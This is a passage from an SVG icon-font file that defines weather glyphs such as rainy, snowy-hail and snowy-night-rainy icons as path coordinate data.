0-7-3l-1-14c0-2 0-3-2-3l-12-8c-3-1-2-6 1-7l13-5z m231-134l12-5c2 0 3-2 3-3l3-14c1-3 5-4 7-1l9 11c1 1 2 1 4 1l14-1c3-1 6 3 4 6l-8 12c0 1-1 3 0 4l5 13c2 3-1 6-4 5l-14-3c-1 0-3 0-4 1l-10 9c-3 2-7 1-7-3l-1-14c0-1-1-2-2-3l-12-7c-3-2-3-6 1-8z m-99 54l-1-9c0-1 0-2-1-3l-8-4c-2-1-2-4 0-5l9-4c1 0 2-1 2-2l2-9c0-2 3-3 5-1l5 7c1 1 2 1 3 1l9-1c2 0 4 3 3 5l-5 7c-1 1-1 2 0 3l3 8c1 3-1 5-3 4l-9-2c-1 0-2 0-2 1l-7 6c-2 1-5 0-5-2z m88 5c0 0 1-1 1-1l1-7c1-1 3-2 3 0l4 4c1 1 1 1 2 1l6 0c2-1 3 1 2 2l-3 6c0 0 0 1 0 1l2 6c1 2-1 3-2 3l-6-2c-1 0-1 0-2 1l-5 4c-1 1-3 0-3-2l0-6c0 0 0-1-1-1l-5-4c-2 0-2-2 0-3l6-2z m-110 88c1 0 1-1 1-2l2-7c0-2 3-3 4-1l5 6c1 0 1 1 2 1l8-1c2 0 3 2 2 4l-4 6c0 1 0 2 0 2l3 8c1 1-1 3-3 3l-7-2c-1 0-2 0-3 0l-5 6c-2 1-4 0-4-2l-1-8c0-1 0-1-1-2l-7-4c-1-1-1-3 1-4 0 0 7-3 7-3z m-129-84c1 0 1 0 1-1l1-5c1-1 2-2 3-1l4 4c0 1 0 1 1 1l5-1c2 0 2 2 2 3l-3 4c0 1 0 1 0 2l2 5c0 1-1 2-2 2l-5-1c-1 0-1 0-2 0l-4 4c-1 0-2 0-2-2l-1-5c0 0 0-1 0-1l-5-3c-1-1-1-2 0-3 0 0 5-2 5-2z m-261-630c-10 5-18 0-25-7-29-28-57-57-85-85-11-11-18-22-5-35 13-12 25-6 36 5 27 27 54 54 82 82 5 5 10 11 10 18 1 11-4 18-13 22z m262-4c-8 4-15 1-21-5-22-23-45-45-67-68-9-8-14-18-4-28 10-9 20-5 28 4 22 22 44 44 66 66 4 4 8 8 8 14 1 9-3 14-10 17z m123-2c-30-30-60-60-89-90-7-6-7-15-3-23 4-7 10-12 22-12 3 0 8 2 12 6 29 30 59 59 88 89 8 8 9 19-1 29-9 9-20 9-29 1z m111-45c-1 0-4-1-5-2-21-13-38-30-52-51-5-7 0-16 6-22 7-6 16-8 23-3 18 13 35 29 47 47 9 13-3 31-19 31z m-408 1c-16-13-32-27-44-44-9-14 2-32 19-32 1 0 4 1 5 2 21 12 37 29 50 49 5 8 2 17-5 24-8 6-17 8-25 1z" />
<glyph glyph-name="rainy-sunny" horiz-adv-x="1000" unicode="&#xee68;" d="M849 398c-49 47-108 61-173 37-13-4-17-5-23 9-43 106-142 165-254 152-103-12-184-94-203-204-1-6 0-15-8-18-18-8-33-19-44-32l0 0s-87-81-2-175c2-3 4-6 7-8l1-1 0 0c21-20 47-32 79-35 33-3 66 0 99-1l285 1c44 0 83-1 122 0 69 2 119 36 147 99 27 60 14 130-33 176z m-601-347c-11 5-19 0-27-7-29-30-58-59-88-88-11-11-18-24-5-37 13-12 26-6 37 5 28 29 57 57 85 85 6 6 11 11 11 19 1 11-4 19-13 23z m271-4c-9 4-15 0-21-6-24-23-47-46-71-70-9-9-14-18-3-29 10-10 20-5 29 4 22 23 45 45 68 68 4 4 8 9 8 15 1 9-3 15-10 18z m128-3c-32-30-63-61-93-93-7-6-7-15-3-23 4-8 11-13 23-13 3 0 8 3 12 7 31 30 62 60 91 91 9 9 10 21 0 30-10 10-21 10-30 1z m115-46c-2 0-4-1-6-2-22-13-39-31-53-52-6-8-1-17 6-23 7-6 16-9 23-4 19 14 36 30 49 49 9 13-3 32-19 32z m-423 1c-17-13-33-28-46-46-9-14 3-33 20-33 1 1 4 1 5 2 21 13 38 31 52 51 5 8 2 18-6 25-8 6-17 8-25 1z m99 631c-3-4-5-9-6-14 81 2 154-34 200-98 2 3 4 7 6 11 28 56 6 123-49 151-56 28-123 6-151-50z m229-40c-2-6 2-14 8-17 2-1 5-2 7-1 17 0 34 1 51 2 8 1 14 9 14 17-1 8-7 16-16 15-17 0-34-2-51-3-7 0-12-6-13-13z m-69 101c8-4 17-1 21 8 4 7 8 14 11 21l10 20c1 1 1 1 1 1 4 8 1 18-7 22-8 4-18 1-22-8-7-14-14-28-21-42-4-8-1-18 7-22z m-239-40c7-3 14-7 21-10l21-11c8-4 17-1 22 6 4 8 1 18-7 22-14 8-29 15-44 22-8 4-18 0-21-7-4-8 0-17 8-22z m315-122c-8 4-18 0-21-7-4-8-1-18 8-22 7-3 14-7 21-10l21-11c8-4 17-1 21 6 5 8 2 18-6 22-14 8-29 15-44 22z m-22 112c5-3 10-3 15 0 14 9 28 18 42 28 7 4 8 14 4 21-5 7-14 10-21 5-15-9-29-18-43-28-10-6-8-21 3-26z m-130 68c11-5 24 3 23 15 0 16-1 32-3 49 0 9-8 15-17 15-8-1-15-8-15-17 1-16 2-32 3-48 1-6 4-11 9-14z m-78-18c2-2 4-4 6-5 7-4 15-2 20 3 5 5 6 13 2 19-9 14-18 27-27 41-5 7-15 9-22 4-8-5-10-14-5-22 9-14 18-27 26-40z" />
<glyph glyph-name="rainy-thunder" horiz-adv-x="1000" unicode="&#xee69;" d="M886 515c-55 53-120 68-192 42-13-5-19-6-25 10-47 117-156 181-281 167-114-13-203-103-224-225-1-7 0-16-9-20-20-9-36-21-49-35l0 0s-96-90-3-194c3-3 6-7 8-9 1-1 1-1 2-2l0 1c22-22 51-35 87-39 36-3 73 0 110-1 14 0 16 8 19 18 17 63 35 126 52 189 3 13 8 19 23 19 49-1 98-1 147 0 16 0 19-5 14-19-10-35-19-70-30-109h159c-24-33-45-63-69-97 48 0 92-1 135 0 77 3 132 40 163 110 29 66 14 143-37 194z m-375-240c-15 0-21 2-16 20 10 30 17 61 26 92 4 11 1 15-11 15-28-1-56-1-84 0-9 0-15-3-17-12-17-61-34-123-51-184-3-10-1-14 10-14 22 0 44-1 66 0 16 1 23 0 18-21-18-67-32-136-48-204l3-3c73 103 146 206 222 312-43 0-81 0-118-1z m-290-144c-12 6-21 1-29-7-33-33-65-65-98-98-12-12-20-25-5-40 14-14 28-7 40 6 32 31 63 62 94 94 7 6 13 12 12 21 1 12-4 20-14 24z m441-7c-35-34-69-68-103-102-7-8-8-17-3-27 5-8 12-14 26-14 3 0 9 3 13 8 34 33 68 67 101 101 10 10 10 23-1 33-10 11-23 11-33 1z m127-51c-2 0-4 0-6-2-24-15-44-35-59-58-6-9 0-18 7-25 8-7 18-10 26-4 21 15 40 33 54 54 10 15-4 35-22 35z m-467 2c-19-15-37-32-51-51-10-16 3-37 22-37 1 1 4 1 6 2 23 15 42 34 57 57 6 9 2 20-6 27-9 7-19 9-28 2z" />
<glyph glyph-name="rainy" horiz-adv-x="1000" unicode="&#xee6a;" d="M886 508c-55 53-120 68-192 42-13-5-19-6-25 10-47 117-156 181-281 167-114-13-203-103-224-225-1-7 0-16-9-20-20-9-36-21-49-35l0 0s-96-90-3-194c3-3 6-7 8-9 1-1 1-1 2-2l0 1c22-22 51-35 87-39 36-3 73 0 110-1l315 1c48 0 92-1 135 0 76 3 132 40 163 110 29 66 14 144-37 194z m-665-384c-12 6-21 1-29-7-33-33-65-65-98-98-12-12-20-25-5-40 14-14 28-7 40 6 32 31 63 62 94 94 7 6 13 12 12 21 1 12-4 20-14 24z m300-4c-10 5-17 1-24-6-26-26-51-52-77-77-10-10-16-21-5-32 12-11 23-6 33 4 25 25 50 50 75 75 5 5 10 10 9 17 1 9-3 16-11 19z m141-3c-35-34-69-68-103-102-7-8-8-17-3-27 5-8 12-14 26-14 3 0 9 3 13 8 34 33 68 67 101 101 10 10 10 23-1 33-10 11-23 11-33 1z m127-51c-2 0-4 0-6-2-24-15-44-35-59-58-6-9 0-18 7-25 8-7 18-10 26-4 21 15 40 33 54 54 10 15-4 35-22 35z m-467 2c-19-15-37-32-51-51-10-16 3-37 22-37 1 1 4 1 6 2 23 15 42 34 57 57 6 9 2 20-6 27-9 7-19 9-28 2z" />
<glyph glyph-name="snow-alt" horiz-adv-x="1000" unicode="&#xee6b;" d="M898 298c-5 20-26 32-46 26l-159-42-61 35v67l61 34 159-42c4-1 7-2 10-2 16 0 31 11 36 28 5 20-7 40-26 45l-88 24 81 46c18 10 24 33 14 51-11 18-33 24-51 14l-81-47 23 88c6 20-6 40-26 46-20 5-40-7-45-27l-43-159-61-35-58 34v70l117 117c15 14 15 38 0 52s-38 15-53 0l-64-64v93c0 21-17 38-37 38-21 0-37-17-37-38v-93l-64 64c-15 15-38 15-53 0-14-14-14-38 0-52l117-117v-71l-58-33-61 35-42 159c-6 20-26 32-46 27-20-6-32-26-26-46l23-88-81 47c-18 10-40 4-50-14-11-18-4-41 13-51l81-46-87-24c-20-5-32-25-27-45 5-17 20-28 36-28 3 0 7 1 10 2l160 42 60-34 0-67-61-35-159 42c-20 6-40-6-46-26-5-20 7-40 27-45l87-24-81-46c-17-11-24-33-13-51 7-12 19-19 32-19 6 0 13 2 19 5l80 47-23-88c-5-20 6-40 26-45 3-1 7-2 10-2 16 0 31 11 36 28l42 160 61 35 58-33v-72l-117-117c-14-14-14-38 0-52 8-8 17-11 27-11 9 0 19 3 26 11l64 64v-93c0-21 16-38 37-38s37 17 37 38v93l65-64c7-8 16-11 26-11s19 3 26 11c15 14 15 38 0 52l-117 117v71l58 34 61-35 43-160c4-17 19-28 36-28 3 0 6 1 9 2 20 5 32 25 26 45l-23 88 81-47c6-3 12-5 18-5 13 0 26 7 33 19 10 18 4 40-14 51l-80 46 87 24c19 5 31 25 26 45z m-340 19l-58-33-58 33 0 67 58 33 57-33v-67z" />
<glyph glyph-name="snow-flake" horiz-adv-x="1000" unicode="&#xee6c;" d="M883 171c-4 17-16 28-35 32-31 6-62 13-93 19-3 1-7 0-7 5 0 5 4 6 8 8 15 3 31 7 46 12 26 7 39 30 32 58-6 22-32 38-56 32-20-6-39-11-59-17-6-2-10-1-9 6 0 16 1 33-1 49 0 6 3 8 8 6 19-8 39-10 58-16 24-8 52 6 58 29 8 28-5 53-31 60l-47 12c-5 1-8 3-8 7 0 6 6 4 9 5 32 7 65 13 97 20 16 3 30 22 32 38 2 27-7 43-28 53-21 9-39 5-58-14-20-22-40-45-60-67-4-4-7-6-14-11 6 21 9 39 15 57 8 22-4 52-24 59-30 10-55-1-63-28-6-20-13-41-18-62-2-7-5-8-11-5-12 8-23 16-36 22-11 5-8 10-2 16 13 13 24 25 37 37 27 25 22 67-15 81-17 7-32 1-45-10-13-11-25-24-37-36-3-3-7-6-13-8 12 35 22 69 35 103 9 23-10 59-34 63-5 1-9 1-14 1-4 0-9 0-13-1-25-4-43-40-34-63 12-34 23-68 35-103-7 2-10 5-14 8-12 12-24 25-37 36-13 11-27 17-45 10-36-14-42-56-15-81 13-12 25-24 37-37 6-6 9-11-2-16-12-6-23-14-35-22-6-3-9-2-11 5-6 21-12 42-19 62-8 27-33 38-62 28-21-7-32-37-25-59 6-18 10-36 15-57-6 5-10 7-13 11-20 22-40 45-61 67-18 19-36 23-57 14-22-10-30-26-28-53 1-16 16-35 31-38 33-7 65-13 97-20 4-1 10 1 10-5 0-4-4-6-8-7-16-4-32-8-48-12-25-7-39-32-31-60 6-23 35-37 58-29 19 6 40 8 58 16 5 2 9 0 8-6-2-16-1-33 0-49 0-7-3-8-10-6-19 6-39 11-59 17-23 6-50-10-55-32-7-28 6-51 32-58 15-4 30-9 46-12 4-1 7-3 8-8 0-5-4-4-8-5-31-6-62-13-93-19-18-4-31-15-35-32-4-18-4-38 14-52 15-11 31-17 50-8 23 10 34 31 50 48 14 14 26 30 43 42-5-10-2-21-7-29-5-9-4-20-8-29-9-24 8-50 37-59 17-6 45 10 51 30 6 21 13 42 19 63 2 8 6 8 11 4 11-8 22-15 34-20 11-5 10-10 3-17-13-13-26-25-38-38-8-9-15-19-16-31-1-20 7-35 24-45 19-12 36-9 53 6 11 9 20 20 30 29 4 3 8 5 13 3 3-2 2-7 1-10-10-25-16-52-27-77-6-16-4-29 3-43 7-17 25-26 43-26 18 0 36 9 44 26 6 14 9 27 2 43-10 25-16 52-27 77-1 3-2 8 2 10 4 2 9 1 12-3 10-9 20-20 30-29 17-15 34-18 54-6 17 10 25 25 23 45-1 12-7 22-15 31-13 13-26 25-38 38-8 7-9 12 2 17 12 5 24 12 35 20 5 4 9 4 11-4 5-21 12-42 19-63 6-20 33-36 50-30 29 9 47 35 37 59-4 9-2 20-8 29-4 8-2 19-7 29 18-12 30-28 43-42 16-17 28-38 50-48 19-9 35-3 51 8 18 14 18 34 13 52z m-383 63c-64-1-121 59-116 116-5 57 53 117 115 116h3c62 1 119-59 114-116 5-57-52-117-116-116z" />
<glyph glyph-name="snow-temp" horiz-adv-x="1000" unicode="&#xee6d;" d="M422 553c9 2 18 3 27 3s18-2 27-3v100l92 93-37 37-55-54v59h-54v-59l-54 54-38-37 92-93v-100z m175-97h-24c2-9 3-18 3-27s-1-18-3-27h24v54z m-121-251v100c-9-2-18-3-27-3s-18 1-27 3v-100l-92-93 38-37 54 54v-59h54v59l40-39c-1 5-1 11-1 16 0 20 2 37 6 53l-45 46z m-151 197c-2 9-3 18-3 27 0 9 1 18 3 27h-100l-93 92-37-38 55-54h-59v-54h59l-55-55 37-37 93 92 100 0z m-185 165l131 1 71-71c10 15 23 28 38 38l-71 71-1 130-53 0 0-77-42 41-37-38 42-41-78 0 0-54z m416-70l41 41v106c0 41 19 69 46 83l1 9-54 1 0-131-72-71c15-10 28-23 38-38z m41-229v52l-41 41c-10-15-23-28-38-38l66-66c4 4 8 7 13 11z m-255 93l-71-71-131 1 0-54 77 0-41-42 37-37 42 41 0-77 53-1 1 131 71 71c-15 10-28 23-38 38z m107 165c-53 0-97-44-97-97 0-54 44-97 97-97 54 0 97 43 97 97 0 53-44 97-97 97z m305 66c0 13-2 22-4 29-6 15-18 15-24 15-6 0-17 0-23-15-3-7-5-16-5-29v-195h56v195z m65-343v378c0 44-31 82-73 91-6 2-13 3-21 3-35 0-66-20-82-49-7-13-12-29-12-45v-381c-15-10-29-22-41-36-19-23-33-50-39-80-3-12-4-24-4-36l0-3c1-99 82-178 181-178 12 0 25 1 37 3 82 17 144 90 144 178 0 66-36 124-90 155z m-91-267c-63 0-114 50-114 113 0 3 1 6 1 9 0 6 1 12 3 17 4 18 13 34 25 46 6 6 12 10 18 14 7 4 15 8 23 10v401c0 11 1 20 3 29 1 4 3 7 4 11 4 6 9 12 16 15 6 3 12 4 19 4 33 0 43-26 43-59v-399c45-11 68-50 72-89 0-3 0-6 0-9 0-62-51-113-113-113z m45 128c3-26-5-50-24-71-15-17 20-33 35-16 22 25 32 56 29 87-2 20-42 20-40 0z" />
<glyph glyph-name="snow" horiz-adv-x="1000" unicode="&#xee6e;" d="M466 501c10 2 21 4 32 4 11 0 22-2 33-4v122l112 112-46 46-67-67v72h-64v-71l-67 66-46-46 113-112 0-122z m65-302c-11-2-22-4-33-4s-22 2-32 4v-122l-113-112 46-46 67 66v-71h65v71l66-66 46 46-112 112v122z m-183 119c-2 11-4 22-4 33 0 11 2 22 4 32h-122l-113 112-45-45 66-67h-71v-65h71l-66-66 45-46 113 112h122z m-225 201l159 0 87-86c11 19 27 34 45 46l-86 86-1 159-65 0 0-94-50 50-46-46 51-50-94-1 0-64z m246-251l-87-86-159 1 0-65 94 0-51-51 46-46 50 51 0-95 65 0 1 159 86 86c-18 12-34 28-45 46z m569 115h-72l66 67-45 45-113-112h-122c3-10 4-21 4-32 0-11-1-22-4-33h122l113-112 45 46-66 66h72v65z m-307 50l87 86 159 0 0 64-94 1 51 50-45 46-51-50 0 94-65 0 0-159-87-86c18-12 34-27 45-46z m246-250l-159-1-87 86c-11-18-27-34-45-46l87-86 0-159 65 0 0 95 51-51 45 46-51 51 94 0 0 65z m-379 285c-65 0-117-52-117-117 0-65 52-118 117-118 65 0 118 53 118 118 0 65-53 117-118 117z" />
<glyph glyph-name="snowy-hail" horiz-adv-x="1000" unicode="&#xee6f;" d="M886 558c-55 53-120 68-192 41-13-5-19-5-25 11-47 117-157 181-281 167-114-13-203-103-224-225-1-7 0-16-9-20-20-9-36-21-49-35l0 0s-96-90-3-194c3-3 6-7 8-9 1-1 1-1 2-2l0 1c22-22 51-35 87-39 36-3 73 0 110-1l315 1c48 0 92-1 135 0 76 3 132 40 163 110 29 66 14 143-37 194z m-386-600c0-20-16-36-36-36s-36 16-36 36c0 19 16 35 36 35s36-16 36-35z m-25 116c0-10-8-18-18-18-10 0-18 8-18 18 0 9 8 18 18 18 10-1 18-9 18-18z m284 35c0-19-16-35-36-35-20 0-36 16-36 35 0 20 16 36 36 36 20 0 36-16 36-36z m-203 42v-7l-6 7-5-5 11-12v-12c2 0 3 0 4 0s2 0 3 0v12l12 12-5 5-7-7v7h-7z m7-60c-1-1-2-1-3-1s-2 0-3 1v-13l-12-12 5-4 7 7v-8h6v8l7-7 5 4-12 12v13z m-19 12c0 1 0 2 0 3 0 1 0 3 0 4h-12l-12 11-5-5 7-6h-7v-7h7l-7-7 5-5 12 12 12 0z m-23 21l17 0 9-9c1 2 2 3 4 5l-9 8 0 17h-6v-10l-6 5-4-4 5-6h-10l0-6z m25-26l-9-9-16 0v-7h10l-5-5 4-5 6 6v-10h6l0 16 9 9c-2 1-3 3-5 5z m54 23l-12-11h-12c0-1 0-3 0-4 0-1 0-2 0-3h12l12-12 5 5-7 7h7v7h-7l7 7-5 4z m-22 24l0-17-9-8c2-2 3-3 5-5l9 9 16 0v6h-10l6 6-5 4-5-5v10l-7 0z m7-68l5-5 4 5-5 5h10v7l-17 0-9 9c-1-2-2-4-4-5l9-9 0-16h6l1 9z m-25 41c-7 0-12-5-12-12 0-6 5-12 12-12 7 0 12 6 12 12 0 7-5 12-12 12z m-274 100v-17l-16 16-10-11 26-26v-28c2 0 5 1 7 1s5-1 8-1v28l26 26-11 11-15-16v17h-15z m15-136c-3-1-5-1-8-1-2 0-5 0-7 1v-28l-26-26 10-11 16 15v-16h15v16l15-15 11 11-26 26v28z m-43 28c0 2 0 5 0 7 0 3 0 5 0 8h-28l-26 26-10-11 15-15h-17v-15h17l-15-16 10-10 26 26h28z m-52 46l37 0 20-20c3 5 7 8 11 11l-20 20 0 37-15 0 0-22-12 12-11-11 12-12-22 0 0-15z m57-58l-20-20-37 0 0-15 22 0-12-12 11-10 12 11 0-21 15 0 0 36 20 20c-4 3-8 7-11 11z m131 42l-11 11-26-26h-28c1-3 1-5 1-8 0-2 0-5-1-7h28l26-26 11 10-15 16h16v15h-16l15 15z m-60 64l0-37-20-20c4-3 7-6 10-11l20 20 37 0 0 15-22 0 12 12-10 11-12-12 0 22-15 0z m47-126l-37 0-20 20c-2-4-6-8-10-11l20-20 0-37 15 1 0 21 12-11 10 10-12 12 22 0 0 15z m-88 66c-15 0-27-12-27-27s12-27 27-27 28 12 28 27-13 27-28 27z m305-110v-3l-3 2-2-1 5-5v-5c0 0 0 0 1 0s1 0 1 0v5l5 5-2 1-3-2v3h-2z m2-24c0 0-1 0-1 0-1 0-1 0-1 0v-5l-5-5 2-2 3 3v-3h2v3l3-3 2 2-5 5 0 5z m-7 5c0 0 0 0 0 1 0 0 0 1 0 1h-5l-5 5-2-2 3-3h-3v-2h3l-3-3 2-2 5 5h5z m-9 8h6l4-4c0 1 1 2 2 2l-4 4v6h-3v-4l-2 2-2-2 3-2h-4l0-2z m10-11l-4-3h-7v-3h4l-2-2 2-2 2 2v-4h3v7l3 3c0 1-1 2-1 2z m23 8l-2 2-5-5h-5c0 0 0-1 0-1 0-1 0-1 0-1h5l5-5 2 2-3 3h3v2h-3l3 3z m-11 11v-6l-3-4c0 0 1-1 1-2l4 4h7v2h-4l2 2-2 2-2-2v4h-3z m8-22h-6l-4 3c0 0-1-1-2-1l4-4v-6h2v3l3-2 1 2-2 2h4l0 3z m-10 7c0-3-3-5-5-5-3 0-5 2-5 5 0 3 2 5 5 5 3 0 5-2 5-5z" />
<glyph glyph-name="snowy-night-hail" horiz-adv-x="1000" unicode="&#xee70;" d="M821 423c-45 44-99 57-159 35-12-4-16-5-21 8-40 98-131 152-234 139-95-11-170-85-187-187-1-6 0-13-8-17-16-7-30-17-40-29l-1 0s-79-75-1-162c2-2 4-5 6-7 1 0 1-1 1-1l0 0c19-18 43-29 73-32 30-2 61 0 92-1l262 1c40 0 76-1 112 0 64 2 110 33 136 91 24 55 12 120-31 162z m-248 304c-26-21-41-49-43-82-1-13 0-25 3-37 41-17 76-47 101-88 4-1 8-1 13-1 70 1 114 60 114 108-17-21-37-32-62-35-26-2-48 5-67 22-17 14-27 32-30 53-5 32 5 60 28 84-22-2-41-11-57-24z m-38 21c1 0 2-1 2-2l3-13c1-4 5-5 7-2l9 10c0 1 2 2 3 2l13-2c4 0 6 4 4 6l-7 12c-1 1-1 2 0 3l5 13c1 3-2 6-5 5l-13-3c-1 0-2 0-3 1l-10 9c-3 2-7 0-7-3l-1-13c0-2-1-3-2-4l-11-6c-3-2-3-6 0-8l13-5z m219-103l13-5c1 0 2-1 2-3l3-13c1-3 5-4 7-1l8 10c1 1 2 1 4 1l13-1c3 0 6 3 4 6l-7 11c-1 2-1 3-1 4l6 12c1 3-2 7-5 6l-13-3c-1-1-2 0-3 0l-10 9c-3 2-7 1-7-2l-1-14c0-1-1-2-2-3l-11-7c-3-1-3-6 0-7z m-94 51l0-8c0-1-1-2-2-3l-7-4c-2-1-2-4 0-5l8-3c1 0 2-1 2-2l2-9c0-2 3-2 4-1l6 7c1 1 2 1 2 1l9-1c2 0 4 3 3 4l-5 8c0 1-1 2 0 2l3 8c1 2-1 4-3 4l-8-2c-1 0-2 0-3 0l-6 6c-2 2-4 1-5-2z m84 5c1 0 1-1 1-1l1-6c1-2 3-2 3-1l4 5c1 0 1 0 2 0l6 0c1 0 2 1 1 2l-3 6c0 0 0 1 0 1l3 6c0 1-1 3-2 2l-6-1c-1-1-1 0-2 0l-5 4c-1 1-2 0-3-1l0-6c0-1 0-1-1-2l-5-3c-1-1-1-2 0-3l6-2z m-104 60c0 0 1-1 1-1l2-8c0-1 2-2 3-1l5 6c1 1 1 1 2 1l7-1c2 0 4 2 3 4l-4 6c-1 1-1 1-1 2l3 7c1 2 0 3-2 3l-7-2c-1 0-2 0-2 1l-6 5c-1 1-4 0-4-2l0-7c0-1-1-2-1-2l-7-4c-1-1-1-3 1-4l7-3z m-124-56c1 0 1 0 1-1l2-5c0-1 1-1 2 0l4 4c0 0 0 0 1 0l5 0c1 0 2 1 1 2l-2 5c-1 0-1 1 0 1l2 5c0 1-1 2-2 2l-5-1c-1-1-1 0-2 0l-3 3c-1 1-3 1-3-1l0-5c0 0-1-1-1-1l-4-3c-1 0-1-2 0-2l4-3z m18-764c0-16-13-29-29-29s-28 13-28 29 12 29 28 29 29-13 29-29z m-20 93c0-8-6-14-14-14s-14 6-14 14 6 15 14 15 14-7 14-15z m228 29c0-16-13-29-29-29s-29 13-29 29 13 29 29 29 29-13 29-29z m-163 34v-6l-5 5-4-4 9-9v-10c1 0 2 0 3 0 1 0 2 0 3 0v10l9 9-4 4-5-5v6h-6v0z m6-49c-1 0-2 0-3 0-1 0-2 0-3 0v-10l-9-9 4-4 5 5v-6h6v6l5-5 4 4-9 9 0 10z m-15 10c-1 1-1 2-1 3 0 1 0 1 1 2h-10l-10 10-4-4 6-6h-6v-5h6l-6-5 4-4 10 9 10 0z m-19 16l13 1 7-8c1 2 3 3 4 4l-7 7 0 13h-5v-7l-5 4-3-4 4-4h-8l0-6z m20-20l-7-7-13 0v-6h8l-4-4 4-4 4 5v-8h5l0 13 7 7c-1 1-3 2-4 4z m43 19l-9-10h-10c0-1 0-1 0-2 0-1 0-2 0-3h10l9-9 4 3-5 6h6v5h-6l5 6-4 4z m-17 19l0-14-8-7c2-1 3-2 4-3l7 7 13 0v5h-7l4 4-4 4-4-4v7l-5 1z m5-55l4-4 4 4-4 4h8v6l-14-1-7 8c-1-2-2-3-4-4l8-7 0-13h5l0 7z m-20 33c-5 0-10-4-10-9 0-6 5-10 10-10 5 0 10 4 10 10 0 5-4 9-10 9z m-220 80v-13l-12 12-8-8 20-21v-23c2 1 4 1 6 1s5 0 6-1v23l21 21-8 8-12-12v13h-13z m12-109c-2 0-4-1-6-1s-4 1-6 1v-23l-21-21 9-8 12 12v-13h12v13l13-12 8 8-21 21 0 23z m-34 22c0 2 0 4 0 6s0 4 0 6h-22l-21 21-9-8 13-13h-14v-12h14l-13-12 9-9 21 21 22 0z m-41 38l29 0 16-16c3 3 5 6 9 8l-16 16 0 30-13 0 1-18-10 10-8-9 9-9-17 0 0-12z m45-47l-16-16-29 0-1-12 18 0-9-10 8-8 9 9 0-17 12 0 1 29 16 16c-4 2-7 5-9 9z m105 34l-8 8-21-21h-23c0-2 1-4 1-6 0-2-1-4-1-6h23l21-21 8 9-12 12h13v12h-13l12 13z m-48 51l0-30-16-16c3-2 6-5 8-8l16 16 30-1 0 12-18 1 10 9-9 9-9-10 0 18h-12z m38-101l-30 0-16 16c-2-4-5-6-8-9l16-16 0-29 12 0 0 17 9-9 9 8-10 10 18 0 0 12z m-71 53c-12 0-21-10-21-22 0-12 9-22 21-22 13 0 22 10 22 22 0 12-10 22-22 22z m244-89v-2l-2 2-1-1 3-4v-4c1 0 1 0 1 0 1 0 1 0 1 0v4l4 4-1 1-3-2v2h-2z m2-19c0 0 0 0-1 0 0 0 0 0-1 0v-4l-3-4 1-1 2 2v-2h3v2l2-2 1 1-3 4v4z m-5 4c-1 0-1 1-1 1 0 0 0 1 1 1h-4l-4 4-2-2 3-2h-3v-2h3l-3-2 2-2 4 4h4z m-8 6h5l3-2c0 0 1 1 2 1l-3 3v5h-2v-3l-2 2-2-2 2-1h-3v-3z m8-8l-3-3h-5v-2h3l-2-1 2-2 2 2v-3h2v5l3 3c-1 0-1 1-2 1z m19 6l-2 2-4-4h-4c1 0 1-1 1-1 0 0 0-1-1-1h4l4-4 2 2-3 2h3v2h-3l3 2z m-9 9v-5l-3-3c1 0 1-1 2-1l3 3h5v2h-3l2 1-2 2-2-2v3h-2z m7-18h-5l-3 3c-1 0-1-1-2-1l3-3v-5h2v3l2-2 1 2-1 1h3v2z m-9 6c0-2-1-4-4-4s-3 2-3 4c0 2 1 4 3 4s4-2 4-4z" />
<glyph glyph-name="snowy-night-rainy" horiz-adv-x="1000" unicode="&#xee71;" d="M812 433c-44 43-97 55-155 34-11-4-15-4-21 8-38 95-126 147-227 136-92-11-164-84-181-182-1-6-1-14-8-17-16-7-29-17-39-28l0 0s-78-73-2-157c2-3 4-5 6-8 1 0 1 0 1-1l0 1c19-18 42-29 71-31 29-3 59 0 89-1l255 0c39 0 74-1 109 0 62 2 107 32 132 89 23 54 12 116-30 157z m-241 296c-26-21-40-47-42-80-1-12 0-24 3-36 40-17 74-46 98-86 4 0 8 0 12 0 68 0 111 58 112 104-17-20-36-31-61-33-25-3-46 5-65 21-16 13-26 31-29 51-5 32 5 59 27 82-21-2-39-10-55-23z m-37 21c1-1 2-2 2-3l3-13c1-3 5-4 7-2l8 10c1 1 2 2 3 2l13-1c3-1 5 3 4 6l-7 10c-1 1-1 3 0 4l5 12c1 3-2 6-5 5l-12-3c-2 0-3 0-4 1l-10 9c-2 2-6 0-6-3l-1-13c0-1 0-2-2-3l-11-7c-3-1-2-6 1-7 0 0 12-4 12-4z m213-101l12-5c1 0 2-1 3-2l2-13c1-3 5-4 7-2l8 10c1 1 2 2 4 2l13-2c3 0 5 4 3 6l-7 11c0 1 0 3 0 4l5 12c2 3-1 6-4 5l-13-3c-1 0-2 0-3 1l-10 8c-2 2-6 1-6-2l-1-13c0-1-1-3-2-3l-11-7c-3-2-3-6 0-7z m-91 50l-1-9c0-1 0-1-1-2l-7-4c-2-1-2-4 0-5l8-3c1 0 1-1 1-2l2-8c1-2 3-3 5-1l5 6c1 1 2 1 3 1l8 0c2-1 4 2 3 3l-5 8c0 0 0 1 0 2l3 8c1 2-1 4-3 4l-8-3c-1 0-2 0-2 1l-7 6c-2 1-4 0-4-2z m81 4c1 0 1 0 1-1l1-5c1-2 3-2 4-1l3 4c1 1 1 1 2 1l6-1c1 0 2 2 1 3l-3 5c0 1 0 1 0 2l2 5c1 1 0 3-2 2l-5-1c-1 0-1 0-2 0l-4 4c-1 1-3 0-3-1l-1-6c0-1 0-1 0-1l-5-3c-2-1-2-3 0-3 0 0 5-3 5-3z m-101 59c0 0 1-1 1-1l1-8c1-1 3-2 4 0l5 5c0 1 1 1 2 1l7-1c2 0 3 2 2 4l-4 6c0 0 0 1 0 2l3 6c1 2-1 4-3 3l-7-1c0-1-1 0-2 0l-5 5c-1 1-3 0-4-2l0-7c0-1 0-1-1-2l-6-3c-2-1-2-4 0-4l7-3z m-120-54c0-1 1-1 1-1l1-5c0-1 2-2 2-1l4 4c0 0 0 1 1 0l5 0c1 0 2 1 1 2l-2 5c-1 0-1 1 0 1l2 4c0 2-1 3-2 2l-5-1c0 0-1 0-1 1l-4 3c-1 1-2 0-2-1l-1-5c0-1 0-1 0-1l-5-3c-1 0-1-2 0-2l5-2z m74-700c-8 3-13 0-18-5-21-20-41-41-61-61-8-7-13-16-3-25 9-8 17-4 25 4 19 19 39 38 58 58 4 4 8 8 8 13 0 8-3 13-9 16z m10 106c-27-26-53-53-80-80-5-5-6-13-2-20 3-7 9-11 20-11 3 0 7 2 11 6 26 26 52 52 78 79 8 8 8 17 0 26-9 8-19 8-27 0z m100-39c-2-1-4-1-5-2-19-12-34-27-46-46-5-6 0-14 5-19 6-5 14-8 20-3 17 12 31 